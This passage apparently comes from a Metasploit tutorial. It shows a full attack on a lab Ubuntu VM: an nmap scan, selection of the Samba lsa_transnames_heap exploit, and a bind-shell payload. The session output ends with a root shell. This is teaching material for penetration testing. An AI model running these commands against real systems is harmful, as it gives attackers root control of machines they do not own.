Let’s try a different exploit on an Ubuntu 9.04 virtual machine. The steps are pretty much the same as for the preceding exploit except that we will select a different payload.
msf >nmap -sT -A -P0 192.168.33.132[*] exec: nmap -sT -A -P0 192.168.33.132 Starting Nmap 5.20 ( http://nmap.org ) at 2011-03-15 19:35 EDT Warning: Traceroute does not support idle or connect scan, disabling... Nmap scan report for 192.168.33.132 Host is up (0.00048s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION80/tcp openhttp Apache httpd 2.2.3 ((Ubuntu) PHP/5.2.1)|_html-title: Index of /
139/tcp opennetbios-ssnSambasmbd 3.X (workgroup: MSHOME)
445/tcp opennetbios-ssnSambasmbd 3.X (workgroup: MSHOME) MAC Address: 00:0C:29:21:AD:08 (VMware) No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).. . . SNIP . . .Host script results: |_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> |_smbv2-enabled: Server doesn't support SMBv2 protocol | smb-os-discovery: | OS: Unix (Samba 3.0.24) | Name: MSHOME\Unknown |_ System time: 2011-03-15 17:39:57 UTC-4 OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 47.11 seconds
We see three open ports: 80, 139, and 445. The message at tells us that the system is running Ubuntu, and at we see that it is running a version of Samba 3.x and Apache 2.2.3 with PHP 5.2.1.
Let’s search for a Samba exploit and try it against the system:
msf >search samba[*] Searching loaded modules for pattern 'samba'... Auxiliary ========= Name Rank Description ---- ---- ----------- admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names HeapOverflowExploits ======== Name Rank Description ---- ---- -----------linux/samba/lsa_transnames_heap good Samba lsa_io_trans_names . . .. . . SNIP . . .msf >use linux/samba/lsa_transnames_heapmsf exploit(lsa_transnames_heap) >show payloadsCompatible Payloads =================== Name Rank Description ---- ---- ----------- generic/debug_trap normal Generic x86 Debug Trap generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline linux/x86/adduser normal Linux Add User linux/x86/chmod normal Linux Chmod linux/x86/exec normal Linux Execute Command linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind TCP Stager (IPv6) linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager. . . SNIP . . .msf exploit(lsa_transnames_heap) >set payload linux/x86/shell_bind_tcppayload => linux/x86/shell_bind_tcp msf exploit(lsa_transnames_heap) >set LPORT 8080LPORT => 8080 msf exploit(lsa_transnames_heap) >set RHOST 192.168.33.132RHOST => 192.168.33.132 msf exploit(lsa_transnames_heap) >exploit[*] Creating nop sled.... [*] Started bind handler [*] Trying to exploit Samba with address 0xffffe410... [*] Connecting to the SMB service.... . . SNIP . . .[*] Calling the vulnerable function... [+] Server did not respond, this is expected [*] Command shell session 1 opened (192.168.33.129:41551 -> 192.168.33.132:8080)ifconfigeth1 Link encap:Ethernet HWaddr 00:0C:29:21:AD:08 inet addr:192.168.33.132 Bcast:192.168.33.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:3178 errors:0 dropped:0 overruns:0 frame:0 TX packets:2756 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:292351 (285.4 KiB) TX bytes:214234 (209.2 KiB) Interrupt:17 Base address:0x2000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)whoamiroot
This type of exploit, called a heap-based attack, takes advantage of dynamic memory allocation, but it isn’t 100 percent reliable. (You may need to attempt the exploit command a few times if it doesn’t work the first time.)
Notice in this example that we used a bind shell to set up a listener port on the target machine; Metasploit handles the direct connection to the system automatically for us. (Remember to use the reverse payload when attacking through a firewall or NAT.)